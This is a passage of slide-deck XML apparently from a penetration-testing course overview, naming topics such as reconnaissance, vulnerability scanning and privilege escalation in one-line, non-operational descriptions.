        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2458"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1542" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Penetration testers need expertise in web applications, networks, and low-level technologies like assembly.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1542" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691257" y="3775869"/>
            <a:ext cx="444302" cy="444302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18671"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829171" y="3849886"/>
            <a:ext cx="168374" cy="296268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2292" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2292" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333004" y="3775869"/>
            <a:ext cx="2632273" cy="308570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1917" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Industry-Standard Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1917" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333005" y="4202907"/>
            <a:ext cx="5595739" cy="632023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2458"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1542" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The path teaches use of professional tools and methodologies for finding vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1542" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691257" y="5254526"/>
            <a:ext cx="444302" cy="444302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18671"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829171" y="5328544"/>
            <a:ext cx="168374" cy="296268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2292" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2292" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333004" y="5254526"/>
            <a:ext cx="2468860" cy="308570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1917" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Career Preparation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1917" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333005" y="5681564"/>
            <a:ext cx="5595739" cy="632023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2458"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1542" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Completing this path readies you for interviews and jobs in the field.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1542"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1762125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493316" y="2149772"/>
            <a:ext cx="5200749" cy="440532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3458"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Getting Started Module Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695226" y="2801740"/>
            <a:ext cx="19050" cy="3671094"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844253" y="3109318"/>
            <a:ext cx="493316" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546199" y="2960291"/>
            <a:ext cx="317103" cy="317103"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18672"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644624" y="3013075"/>
            <a:ext cx="120253" cy="211435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="2942630"/>
            <a:ext cx="1833067" cy="220266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1708"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Active Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="3247431"/>
            <a:ext cx="10218638" cy="225524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1083" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Learning to gather information about target systems through direct interaction and scanning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844253" y="4062313"/>
            <a:ext cx="493316" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546199" y="3913287"/>
            <a:ext cx="317103" cy="317103"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18672"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644624" y="3966071"/>
            <a:ext cx="120253" cy="211435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="3895626"/>
            <a:ext cx="1762125" cy="220266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1708"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Vulnerability Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="4200426"/>
            <a:ext cx="10218638" cy="225524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1083" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Identifying potential security weaknesses in networks, systems, and applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844253" y="5015309"/>
            <a:ext cx="493316" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546199" y="4866283"/>
            <a:ext cx="317103" cy="317103"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18672"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644624" y="4919068"/>
            <a:ext cx="120253" cy="211435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="4848622"/>
            <a:ext cx="1762125" cy="220266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1708"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="5153422"/>
            <a:ext cx="10218638" cy="225524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1083" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Techniques to gain higher-level access permissions on compromised systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844253" y="5968306"/>
            <a:ext cx="493316" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546199" y="5819279"/>
            <a:ext cx="317103" cy="317103"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18672"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
